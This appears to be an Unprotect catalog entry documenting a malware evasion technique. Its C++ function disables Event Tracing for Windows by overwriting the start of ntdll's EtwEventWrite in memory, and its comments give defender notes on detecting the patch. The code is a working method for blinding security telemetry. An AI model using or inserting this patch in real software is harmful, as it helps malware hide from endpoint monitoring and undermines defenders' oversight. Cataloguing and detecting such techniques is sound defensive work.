Windows C++ / Disabling Event Tracing for Windows (ETW)

Author Unprotect
Platform Windows
Language C++
Technique Disabling Event Tracing for Windows (ETW)

Description:

Source code snippet from @_vivami

Code

// Documents the ETW-patching technique: the first bytes of the exported
// ntdll!EtwEventWrite routine in the current process are overwritten with
// `xor rax, rax; ret`, so the function returns 0 immediately and no event
// is emitted through it.
//
// Defender notes:
//  - This is an in-memory modification of a system DLL's code page. The bytes
//    at the EtwEventWrite export no longer match the on-disk image, so an
//    integrity check that compares the mapped export's prologue against the
//    file (or a known-good prologue) exposes the patch.
//  - The code page is flipped to PAGE_READWRITE and back through
//    NtProtectVirtualMemory; a protection change on an ntdll code page is
//    itself an observable event for telemetry that records such calls.
//  - `sNtdll` is not defined in this snippet; the module-name string is
//    expected to come from the enclosing code.
void disableETW(void) {
	// return 0
	unsigned char patch[] = { 0x48, 0x33, 0xc0, 0xc3};     // xor rax, rax; ret
	
	// Receives the previous page protection so it can be restored afterwards.
	ULONG oldprotect = 0;
	// 4 bytes: the length of the patch written below.
	size_t size = sizeof(patch);
	
	// Pseudo-handle for the calling process; no CloseHandle required.
	HANDLE hCurrentProc = GetCurrentProcess();
	
	// "EtwEventWrite" built as a byte array rather than a string literal.
	unsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };
	
	// Address of the export inside the already-loaded module named by sNtdll.
	void *pEventWrite = GetProcAddress(GetModuleHandle((LPCSTR) sNtdll), (LPCSTR) sEtwEventWrite);
	
	// The native call takes the base address and size by pointer because it may
	// round them out to page granularity; the code page becomes writable here.
	NtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, PAGE_READWRITE, &oldprotect);
	
	// patch[0] is one byte, so the length written is simply `size`.
	memcpy(pEventWrite, patch, size / sizeof(patch[0]));
	
	// Restore the original protection, then drop stale instruction-cache lines
	// so the CPU executes the patched bytes.
	NtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, oldprotect, &oldprotect);
	FlushInstructionCache(hCurrentProc, pEventWrite, size);
	
}

Created

April 19, 2022

Last Revised

April 22, 2024